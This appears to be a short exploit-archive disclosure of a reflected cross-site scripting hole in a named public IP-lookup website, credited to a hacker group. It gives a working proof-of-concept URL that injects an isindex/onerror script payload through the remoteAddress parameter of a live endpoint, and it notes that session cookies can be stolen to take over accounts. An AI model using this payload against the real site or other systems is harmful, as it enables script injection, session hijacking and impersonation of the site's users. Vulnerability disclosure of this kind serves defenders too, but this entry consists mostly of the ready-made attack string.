# Exploit Title: Yougetsignal Cross Site Scripting (Xss) Vulnerability # Google Dork: N/A # Date: 2018-01-20 # Exploit Author: Iran.Anonymous # Vendor Homepage: https://www.yougetsignal.com # Tested on: Windows ******************************************* # The impact of this vulnerability : Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. # Attack details : URL encoded POST input { remoteAddress } was set to 37.27.95.133<WRATX4>SCII7[!+!]</WRATX4> The input is reflected inside a text element. # The most popular site is exploiters to find sites on the server. # Proof : https://www.yougetsignal.com/tools/network-location/php/get-network-location-json.php?remoteAddress=37.27.95.133%3Cisindex%20type%3dimage%20src%3d1%20onerror%3dprompt(0411)%3E&_= ******************************************* # Thanks to : ~~> MR.Khatar || Turk.Khan || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY # Discovered By: K4an